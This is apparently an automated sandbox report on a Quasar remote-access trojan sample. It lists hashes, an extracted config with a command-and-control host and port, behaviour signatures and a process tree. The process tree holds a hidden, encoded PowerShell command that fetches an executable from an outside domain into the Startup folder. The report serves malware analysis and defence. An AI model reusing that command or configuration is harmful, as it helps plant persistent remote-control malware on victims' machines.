Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
11/01/2025, 05:04
Static task
static1
General
-
Target
JaffaCakes118_f7bbf426b790e58d31c112ad57028727.exe
-
Size
3.0MB
-
MD5
f7bbf426b790e58d31c112ad57028727
-
SHA1
c6c6ad699c01445d76a5e72c1890a4c77614e77a
-
SHA256
fbd232bef38a185689126a83412f660670babd5fcd67674c698c3af1d9ccdb12
-
SHA512
3f35132aaf069d598b66d3d87122f85beda6762a7c849ef5a3d36fd98ffae6c60367f07ba32217155082e469bdd77b2c6c0dce7fbe268dc6a4381540ba731fea
-
SSDEEP
49152:mhNG2xCF8FythJYb7T6jNCAaYGzIKuZaonz0XdetFkMKoW4pOXs:EXC6othq7WjNCduZaWnBOX
Malware Config
Extracted
quasar
1.4.0
ROTAZ
johnnycoukiedough-32583.portmap.host:31049
3beba8ff-20e4-4900-b227-66c42193224d
-
encryption_key
EF6D608E6D632DE3BE9AEFD87041D26415D93D65
-
install_name
Office365.exe
-
log_directory
Versions
-
reconnect_delay
3000
-
startup_key
StartupAssistant
-
subdirectory
Microsoft-Office365
Signatures
-
Quasar family
-
Quasar payload 2 IoCs
resource yara_rule behavioral1/files/0x0008000000023c9d-35.dat family_quasar behavioral1/memory/2316-37-0x00000000003A0000-0x0000000000424000-memory.dmp family_quasar -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 2848 powershell.exe 3064 powershell.exe 3032 powershell.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation Client.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation setup.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation Client.exe -
Executes dropped EXE 5 IoCs
pid Process 1516 Office.exe 636 OFFICE~2.EXE 2316 Client.exe 896 setup.exe 4032 Client.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" OFFICE~2.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" JaffaCakes118_f7bbf426b790e58d31c112ad57028727.exe -
Checks system information in the registry 2 TTPs 2 IoCs
System information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName setup.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer setup.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Office.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 60 PING.EXE 5044 PING.EXE -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString setup.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU setup.exe -
Runs ping.exe 1 TTPs 2 IoCs
pid Process 60 PING.EXE 5044 PING.EXE -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2848 powershell.exe 3064 powershell.exe 3064 powershell.exe 3032 powershell.exe 3032 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 2848 powershell.exe Token: SeDebugPrivilege 2316 Client.exe Token: SeDebugPrivilege 3064 powershell.exe Token: SeDebugPrivilege 3032 powershell.exe Token: SeDebugPrivilege 4032 Client.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 896 setup.exe -
Suspicious use of WriteProcessMemory 36 IoCs
description pid Process procid_target PID 1520 wrote to memory of 1516 1520 JaffaCakes118_f7bbf426b790e58d31c112ad57028727.exe 83 PID 1520 wrote to memory of 1516 1520 JaffaCakes118_f7bbf426b790e58d31c112ad57028727.exe 83 PID 1520 wrote to memory of 1516 1520 JaffaCakes118_f7bbf426b790e58d31c112ad57028727.exe 83 PID 1516 wrote to memory of 4108 1516 Office.exe 85 PID 1516 wrote to memory of 4108 1516 Office.exe 85 PID 1516 wrote to memory of 4108 1516 Office.exe 85 PID 4108 wrote to memory of 2848 4108 cmd.exe 86 PID 4108 wrote to memory of 2848 4108 cmd.exe 86 PID 4108 wrote to memory of 2848 4108 cmd.exe 86 PID 1520 wrote to memory of 636 1520 JaffaCakes118_f7bbf426b790e58d31c112ad57028727.exe 88 PID 1520 wrote to memory of 636 1520 JaffaCakes118_f7bbf426b790e58d31c112ad57028727.exe 88 PID 636 wrote to memory of 2316 636 OFFICE~2.EXE 97 PID 636 wrote to memory of 2316 636 OFFICE~2.EXE 97 PID 2316 wrote to memory of 3416 2316 Client.exe 100 PID 2316 wrote to memory of 3416 2316 Client.exe 100 PID 3416 wrote to memory of 4320 3416 cmd.exe 103 PID 3416 wrote to memory of 4320 3416 cmd.exe 103 PID 3416 wrote to memory of 60 3416 cmd.exe 104 PID 3416 wrote to memory of 60 3416 cmd.exe 104 PID 636 wrote to memory of 896 636 OFFICE~2.EXE 102 PID 636 wrote to memory of 896 636 OFFICE~2.EXE 102 PID 636 wrote to memory of 896 636 OFFICE~2.EXE 102 PID 896 wrote to memory of 3064 896 setup.exe 107 PID 896 wrote to memory of 3064 896 setup.exe 107 PID 896 wrote to memory of 3064 896 setup.exe 107 PID 896 wrote to memory of 3032 896 setup.exe 112 PID 896 wrote to memory of 3032 896 setup.exe 112 PID 896 wrote to memory of 3032 896 setup.exe 112 PID 3416 wrote to memory of 4032 3416 cmd.exe 114 PID 3416 wrote to memory of 4032 3416 cmd.exe 114 PID 4032 wrote to memory of 3324 4032 Client.exe 116 PID 4032 wrote to memory of 3324 4032 Client.exe 116 PID 3324 wrote to memory of 2372 3324 cmd.exe 118 PID 3324 wrote to memory of 2372 3324 cmd.exe 118 PID 3324 wrote to memory of 5044 3324 cmd.exe 119 PID 3324 wrote to memory of 5044 3324 cmd.exe 119
Processes
-
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_f7bbf426b790e58d31c112ad57028727.exe"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_f7bbf426b790e58d31c112ad57028727.exe"1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1520 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Office.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Office.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1516 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c start powershell - WindowStyle Hidden - enc JAB1AHMAZQByACAAPQAgACgAKABHAGUAdAAtAFcATQBJAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAEMAbwBtAHAAdQB0AGUAcgBTAHkAcwB0AGUAbQApAC4AVQBzAGUAcgBuAGEAbQBlACkALgBTAHAAbABpAHQAKAAcIFwAHSApAFsAMQBdADsAIABjAGQAIAAcIEMAOgBcAHUAcwBlAHIAcwBcACQAdQBzAGUAcgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAUwB0AGEAcgB0ACAATQBlAG4AdQBcAFAAcgBvAGcAcgBhAG0AcwBcAFMAdABhAHIAdAB1AHAAXAAdIDsAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAcIGgAdAB0AHAAOgAvAC8AdABlAGMAaABnAGUAbgBpAGMAcwAuAG4AbAAvAFMAdABhAHIAdAB1AHAAQQBzAHMAaQBzAHQAYQBuAHQALgBlAHgAZQAiACAALQBPAHUAdABGAGkAbABlACAAHCBDADoAXABVAHMAZQByAHMAXAAkAHUAcwBlAHIAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFMAdABhAHIAdAAgAE0AZQBuAHUAXABQAHIAbwBnAHIAYQBtAHMAXABTAHQAYQByAHQAdQBwAFwAUwB0AGEAcgB0AHUAcABBAHMAcwBpAHMAdABhAG4AdAAuAGUAeABlAB0gOwA=3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4108 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell - WindowStyle Hidden - enc JAB1AHMAZQByACAAPQAgACgAKABHAGUAdAAtAFcATQBJAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAEMAbwBtAHAAdQB0AGUAcgBTAHkAcwB0AGUAbQApAC4AVQBzAGUAcgBuAGEAbQBlACkALgBTAHAAbABpAHQAKAAcIFwAHSApAFsAMQBdADsAIABjAGQAIAAcIEMAOgBcAHUAcwBlAHIAcwBcACQAdQBzAGUAcgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAUwB0AGEAcgB0ACAATQBlAG4AdQBcAFAAcgBvAGcAcgBhAG0AcwBcAFMAdABhAHIAdAB1AHAAXAAdIDsAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAcIGgAdAB0AHAAOgAvAC8AdABlAGMAaABnAGUAbgBpAGMAcwAuAG4AbAAvAFMAdABhAHIAdAB1AHAAQQBzAHMAaQBzAHQAYQBuAHQALgBlAHgAZQAiACAALQBPAHUAdABGAGkAbABlACAAHCBDADoAXABVAHMAZQByAHMAXAAkAHUAcwBlAHIAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFMAdABhAHIAdAAgAE0AZQBuAHUAXABQAHIAbwBnAHIAYQBtAHMAXABTAHQAYQByAHQAdQBwAFwAUwB0AGEAcgB0AHUAcABBAHMAcwBpAHMAdABhAG4AdAAuAGUAeABlAB0gOwA=4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2848
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OFFICE~2.EXEC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OFFICE~2.EXE2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:636 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Client.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Client.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2316 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZPbNKKqhvpPc.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:3416 -
C:\Windows\system32\chcp.comchcp 650015⤵PID:4320
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost5⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:60
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Client.exe"C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Client.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4032 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tl5vfuwwckCh.bat" "6⤵
- Suspicious use of WriteProcessMemory
PID:3324 -
C:\Windows\system32\chcp.comchcp 650017⤵PID:2372
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost7⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5044
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\setup.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\setup.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Checks system information in the registry
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:896 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile "$package = Get-AppxPackage Microsoft.Office.Desktop -allUsers; if (!$package) { $Error.Add(\"Package is not installed\")}; if ($error.Count -eq 0) { Out-File -FilePath 'C:\Users\Admin\AppData\Local\Temp\Office.ValidateResult.scratch' -InputObject '1' -Encoding ascii; } else { Out-File -FilePath 'C:\Users\Admin\AppData\Local\Temp\Office.ValidateResult.scratch' -InputObject '0' -Encoding ascii; Out-File -FilePath 'C:\Users\Admin\AppData\Local\Temp\Office.ValidateError.scratch' -InputObject $error -Encoding ascii;} "4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3064
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile "$package = Get-AppxPackage Microsoft.Office.Desktop -allUsers; if (!$package) { $Error.Add(\"Package is not installed\")}; if ($error.Count -eq 0) { Out-File -FilePath 'C:\Users\Admin\AppData\Local\Temp\Office.ValidateResult.scratch' -InputObject '1' -Encoding ascii; } else { Out-File -FilePath 'C:\Users\Admin\AppData\Local\Temp\Office.ValidateResult.scratch' -InputObject '0' -Encoding ascii; Out-File -FilePath 'C:\Users\Admin\AppData\Local\Temp\Office.ValidateError.scratch' -InputObject $error -Encoding ascii;} "4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3032
-
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD58f0271a63446aef01cf2bfc7b7c7976b
SHA1b70dad968e1dda14b55ad361b7fd4ef9ab6c06d7
SHA256da740d78ae00b72cb3710d1a1256dc6431550965d20afaa65e5d5860a4748e8c
SHA51278a403c69f1284b7dd41527019f3eede3512a5e4d439d846eca83557b741ca37bcf56c412f3e577b9dd4cfa5a6d6210961215f14cb271b143f6eb94f69389cf5
-
Filesize
1KB
MD57848291f9332413a0cc4d140f8250032
SHA15f3afdd8d8fb70b27cbdd894edbff6b8400e5fea
SHA2562bc2bc398504fddc7b5fc4099792e87db95cacb4f59e6003cb4241cd58d23421
SHA5122480d830db8e2c4aa9f4269f017afb6ef1be120ae10af46643e9cb7692a9c0a9739d2df69590011c48e44834482d332fd9288b5239e306b3438ca9e3cb5f2139
-
Filesize
18KB
MD5fc7174fbcbc4ddfd5856cb73fe45a319
SHA1a2f7999597c37d4bfd99e5a04450bc42eaea1616
SHA2561a97f67394d6f9907c6fc9d7cbaab5b0b0ddef681910e4adce20636eb44ee21e
SHA512c41078bb809c26c09b20a599da96d8c0075a169858adea81768efb194e9b06095296afb9b3f98d6900c815b95c7f5d93751b8b7d09fb7479cd93388d12f820c5
-
Filesize
3.0MB
MD55ba44ef6e4794a232ab680c01289ab13
SHA1cbba30dd455680e31ecd27567e71f4d8459c9d1e
SHA25630e4bb6f6d78d8d66e9df4b8c856cc2877096c6851be7c167ed23dff72add67e
SHA5129968179e34f56e7b6b8c5b1618c0ce487a99228b0eb66aa48570fb0c5f3d6aa05b13038cfc4e4ce2815a153ab055d0070a1d0accb77935fe80a98db404d1efd5
-
Filesize
52KB
MD5a090e5ae660cbd87be5aaeb8996a87af
SHA1418df60f5052a90e31271d32ace2f70985874e85
SHA256f53b115f66670de3a58e5266a7634bd057358d929f8538e8cf27eddbd584dc89
SHA5124b6c65e48afbb61ee741501e8e2893050452774b2abf91936a0d206620d29b8e38243fae8227b4ab6d1ab438f5de98eaa4b3fcfda122faff9b7b01997283657d
-
Filesize
502KB
MD5de3f09bb9ec0ec30a7fc1c6c6f975498
SHA1d31b7bc5b58b7ecceef42d33f469fe9f364390ca
SHA256b957fbb48f0629b9abc9e55f13bf0a68c3acb8b0b7874d9baf3d9bb183d3a60b
SHA512880f99d84f4a9763f43e3f8a71192b648fa0ffa8b1b6188b8335d33c16ff4687bf80f3431028e13eb29aee5f931a1c8f39a65c24799f3f8d00b3a54af007cb9d
-
Filesize
7.1MB
MD5c43fa7c24d8f0dec0c1e55dbff369fd6
SHA11c3ec971331d5dec70e6ecbad6b8a4302d5550a7
SHA256aae9c94bc546d208868bc04a823ad6a716b1b4d3ad7010263b0690082e3b8da8
SHA512e881481f53b55c48f3c437ac057952a27217343db261b9b9c7db0cc1777205e5d5a2a2602b80ddd33c2bd042808125f43a11816d42c785fdad9bbe0f709e8c5e
-
Filesize
26B
MD5bd3457e50947d4280734e74b51b5b68d
SHA1424635c6b5622a6c01a59d290a1c9ab8e593effc
SHA25623d647979bc5dc186de5ba3e00a222a912ab8e4782eb6407efa70e29e95979f5
SHA512e83e3615a5e94af288eb1c9b92f55e271765cc43531ec94574371debf63c0c4a58327b6fd8a4775bfba8a3234220cb0396b6d33164309a09a1d826c0689143fb
-
Filesize
3B
MD521438ef4b9ad4fc266b6129a2f60de29
SHA15eb8e2242eeb4f5432beeec8b873f1ab0a6b71fd
SHA25613bf7b3039c63bf5a50491fa3cfd8eb4e699d1ba1436315aef9cbe5711530354
SHA51237436ced85e5cd638973e716d6713257d692f9dd2e1975d5511ae3856a7b3b9f0d9e497315a058b516ab31d652ea9950938c77c1ad435ea8d4b49d73427d1237
-
Filesize
214B
MD5452e2923520afdcedf4c3a5ed06fbd8f
SHA191a38e71752df70dddfcfbb6f1f743a2bdfe4444
SHA25696edf286c33cd2dff24ec9a122efc4115a0371cb4a7fd11af7c5b17e7240f921
SHA5126175f61485dd2e207baf070661c21fcc801cc814d0e6b2253dcb646233a88eda22ca72167257657c7a1f9ae2f45c739e2254da091bffe363a350c9167962cd1c
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
214B
MD5cc78efb479dfdc33f0495d9fd3b259ca
SHA1fa3f1d7b9bb0f7afd3b26a7ad5363498977c38cf
SHA256665c6b80720dad302d06d7bfb73f748bc91159698b89c541e5786b58c666a259
SHA512bde4a37c9c73ddbd8886a8bad2464ef7af62ef75e6b9930469c27783986f635c089614ab31de8d71bbd235aa6d75f7475f5f4059578320d089a1da90a72df634